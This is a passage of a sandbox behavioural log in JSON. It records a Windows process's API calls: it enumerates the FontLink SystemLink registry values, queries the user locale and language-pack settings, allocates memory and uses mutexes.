"Handle", "value": "0x00000254" }, { "name": "Index", "value": "36" }, { "name": "ValueName", "value": "NSimSun" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\NSimSun" } ], "repeated": 0, "id": 259 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "37" }, { "name": "ValueName", "value": "Microsoft YaHei" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Microsoft YaHei" } ], "repeated": 0, "id": 260 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "38" }, { "name": "ValueName", "value": "Microsoft YaHei Bold" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Microsoft YaHei Bold" } ], "repeated": 0, "id": 261 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "39" }, { "name": "ValueName", "value": "Microsoft YaHei UI" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Microsoft YaHei UI" } ], "repeated": 0, "id": 262 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "40" }, { "name": "ValueName", "value": "Microsoft YaHei UI Bold" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Microsoft YaHei UI Bold" } ], "repeated": 0, "id": 263 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "41" }, { "name": "ValueName", "value": "Microsoft YaHei UI Light" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Microsoft YaHei UI Light" } ], "repeated": 0, "id": 264 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "42" }, { "name": "ValueName", "value": "Yu Gothic UI" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Yu Gothic UI" } ], "repeated": 0, "id": 265 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "43" }, { "name": "ValueName", "value": "Yu Gothic UI Bold" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Yu Gothic UI Bold" } ], "repeated": 0, "id": 266 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "44" }, { "name": "ValueName", "value": "Yu Gothic UI Light" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Yu Gothic UI Light" } ], "repeated": 0, "id": 267 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "45" }, { "name": "ValueName", "value": "Yu Gothic UI Semilight" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Yu Gothic UI Semilight" } ], "repeated": 0, "id": 268 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "46" }, { "name": "ValueName", "value": "Yu Gothic UI Semibold" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Yu Gothic UI Semibold" } ], "repeated": 0, "id": 269 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "47" }, { "name": "ValueName", "value": "Meiryo" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Meiryo" } ], "repeated": 0, "id": 270 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "48" }, { "name": "ValueName", "value": "Meiryo Bold" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Meiryo Bold" } ], "repeated": 0, "id": 271 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "49" }, { "name": "ValueName", "value": "Meiryo UI" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Meiryo UI" } ], "repeated": 0, "id": 272 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "50" }, { "name": "ValueName", "value": "Meiryo UI Bold" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Meiryo UI Bold" } ], "repeated": 0, "id": 273 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "51" }, { "name": "ValueName", "value": "MS Gothic" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\MS Gothic" } ], "repeated": 0, "id": 274 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "52" }, { "name": "ValueName", "value": "MS PGothic" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\MS PGothic" } ], "repeated": 0, "id": 275 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "53" }, { "name": "ValueName", "value": "MS UI Gothic" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\MS UI Gothic" } ], "repeated": 0, "id": 276 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "54" }, { "name": "ValueName", "value": "MS Mincho" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\MS Mincho" } ], "repeated": 0, "id": 277 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "55" }, { "name": "ValueName", "value": "MS PMincho" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\MS PMincho" } ], "repeated": 0, "id": 278 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "56" }, { "name": "ValueName", "value": "Batang" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Batang" } ], "repeated": 0, "id": 279 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "57" }, { "name": "ValueName", "value": "BatangChe" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\BatangChe" } ], "repeated": 0, "id": 280 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "58" }, { "name": "ValueName", "value": "Dotum" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Dotum" } ], "repeated": 0, "id": 281 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "59" }, { "name": "ValueName", "value": "DotumChe" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\DotumChe" } ], "repeated": 0, "id": 282 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "60" }, { "name": "ValueName", "value": "Gulim" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Gulim" } ], "repeated": 0, "id": 283 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "61" }, { "name": "ValueName", "value": "GulimChe" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\GulimChe" } ], "repeated": 0, "id": 284 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "62" }, { "name": "ValueName", "value": "Gungsuh" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Gungsuh" } ], "repeated": 0, "id": 285 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "63" }, { "name": "ValueName", "value": "GungsuhChe" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\GungsuhChe" } ], "repeated": 0, "id": 286 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "64" }, { "name": "ValueName", "value": "Malgun Gothic" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Malgun Gothic" } ], "repeated": 0, "id": 287 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "65" }, { "name": "ValueName", "value": "Malgun Gothic Bold" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Malgun Gothic Bold" } ], "repeated": 0, "id": 288 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "66" }, { "name": "ValueName", "value": "Malgun Gothic Semilight" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Malgun Gothic Semilight" } ], "repeated": 0, "id": 289 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": false, "return": "0x00000103", "pretty_return": "NO_MORE_ITEMS", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "67" }, { "name": "ValueName", "value": "" }, { "name": "Type", "value": "0", "pretty_value": "REG_NONE" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\" } ], "repeated": 0, "id": 290 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" } ], "repeated": 0, "id": 291 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x008e4000" }, { "name": "RegionSize", "value": "0x00007000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 292 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000419", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000419" }, { "name": "LanguageName", "value": "Russian" } ], "repeated": 0, "id": 293 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0" }, { "name": "Handle", "value": "0x00000254" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0" } ], "repeated": 0, "id": 294 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "ValueName", "value": "Disable" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\Disable" } ], "repeated": 0, "id": 295 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "ValueName", "value": "DataFilePath" }, { "name": "Data", "value": "C:\\Windows\\Fonts\\staticcache.dat" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\DataFilePath" } ], "repeated": 0, "id": 296 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" } ], "repeated": 0, "id": 297 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "filesystem", "api": "NtCreateFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileHandle", "value": "0x00000009" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\Fonts\\staticcache.dat" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "no" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 298 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x008eb000" }, { "name": "RegionSize", "value": "0x00015000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 299 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00900000" }, { "name": "RegionSize", "value": "0x00009000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 300 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x7ffee3470000" }, { "name": "FunctionName", "value": "RtlDllShutdownInProgress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee34d3410" } ], "repeated": 0, "id": 301 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "synchronization", "api": "NtCreateMutant", "status": true, "return": "0x40000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "MutexName", "value": "Local\\SM0:3308:304:WilStaging_02" }, { "name": "InitialOwner", "value": "0" } ], "repeated": 0, "id": 302 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 303 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 304 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000258" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 305 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 306 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000025c" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 307 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 308 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000025c" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 309 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000025c" } ], "repeated": 0, "id": 310 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000258" } ], "repeated": 0, "id": 311 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "synchronization", "api": "NtReleaseMutant", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" } ], "repeated": 0, "id": 312 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" } ], "repeated": 0, "id": 313 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "93" }, { "name": "ProcessInformation", "value": "\\x7f7\\x9e}" } ], "repeated": 0, "id": 314 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtOpenSection", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": 